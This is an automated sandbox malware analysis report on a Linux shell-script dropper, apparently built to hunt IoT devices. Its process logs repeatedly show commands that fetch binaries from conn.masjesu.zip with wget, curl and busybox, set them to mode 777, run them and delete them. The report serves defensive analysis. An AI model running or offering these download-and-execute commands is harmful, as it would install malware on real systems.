Malware Analysis Report

2025-04-03 19:17

Sample ID 241029-czbwhssgmb
Target 754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
SHA256 754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a

Threat Level: Shows suspicious behavior

The file 754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

Executes dropped EXE

File and Directory Permissions Modification

Checks CPU configuration

Writes file to tmp directory

System Network Configuration Discovery

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-29 02:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-29 02:30

Reported

2024-10-29 02:33

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

132s

Command Line

[/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh

[/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.193.91:443 tcp
GB 89.187.167.8:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-29 02:30

Reported

2024-10-29 02:32

Platform

debian9-armhf-20240611-en

Max time kernel

148s

Max time network

3s

Command Line

[/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh

[/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-29 02:30

Reported

2024-10-29 02:32

Platform

debian9-mipsbe-20240611-en

Max time kernel

79s

Max time network

81s

Command Line

[/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA N/A
N/A /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ N/A
N/A /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F N/A
N/A /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw N/A
N/A /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 N/A
N/A /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP N/A
N/A /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q N/A
N/A /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB N/A
N/A /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 N/A
N/A /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em N/A
N/A /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ N/A
N/A /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx N/A
N/A /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD N/A
N/A /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l N/A
N/A /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA N/A
N/A /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ N/A
N/A /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F N/A
N/A /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw N/A
N/A /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 N/A
N/A /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP N/A
N/A /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q N/A
N/A /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx N/A
N/A /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD N/A
N/A /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l N/A
N/A /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB N/A
N/A /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 N/A
N/A /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em N/A
N/A /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 /usr/bin/curl N/A
File opened for modification /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ /usr/bin/curl N/A
File opened for modification /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /usr/bin/curl N/A
File opened for modification /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 /usr/bin/curl N/A
File opened for modification /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx /usr/bin/curl N/A
File opened for modification /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l /usr/bin/curl N/A
File opened for modification /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw /usr/bin/curl N/A
File opened for modification /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /usr/bin/curl N/A
File opened for modification /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /usr/bin/curl N/A
File opened for modification /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q /usr/bin/curl N/A
File opened for modification /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em /usr/bin/curl N/A
File opened for modification /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP /usr/bin/curl N/A
File opened for modification /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB /usr/bin/curl N/A
File opened for modification /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em /usr/bin/curl N/A
File opened for modification /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ /usr/bin/curl N/A
File opened for modification /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP /usr/bin/curl N/A
File opened for modification /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw /usr/bin/curl N/A
File opened for modification /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 /usr/bin/curl N/A
File opened for modification /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /usr/bin/curl N/A
File opened for modification /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /usr/bin/curl N/A
File opened for modification /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 /usr/bin/curl N/A
File opened for modification /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD /usr/bin/curl N/A
File opened for modification /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /usr/bin/curl N/A
File opened for modification /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB /usr/bin/curl N/A
File opened for modification /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx /usr/bin/curl N/A
File opened for modification /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q /usr/bin/curl N/A
File opened for modification /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l /usr/bin/curl N/A
File opened for modification /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD /usr/bin/curl N/A

Processes

/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh

[/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/chmod

[chmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA

[./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/rm

[rm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/chmod

[chmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ

[./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/rm

[rm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/chmod

[chmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F

[./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/rm

[rm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/bin/chmod

[chmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw

[./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/bin/rm

[rm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/bin/chmod

[chmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3

[./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/bin/rm

[rm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/bin/chmod

[chmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP

[./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/bin/rm

[rm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/bin/chmod

[chmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q

[./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/bin/rm

[rm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/bin/chmod

[chmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB

[./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/bin/rm

[rm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/bin/chmod

[chmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6

[./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/bin/rm

[rm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/bin/chmod

[chmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em

[./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/bin/rm

[rm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/bin/chmod

[chmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ

[./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/bin/rm

[rm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/bin/chmod

[chmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx

[./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/bin/rm

[rm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/bin/chmod

[chmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD

[./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/bin/rm

[rm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/bin/chmod

[chmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l

[./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/bin/rm

[rm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/chmod

[chmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA

[./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/rm

[rm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/chmod

[chmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ

[./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/rm

[rm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/chmod

[chmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F

[./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/rm
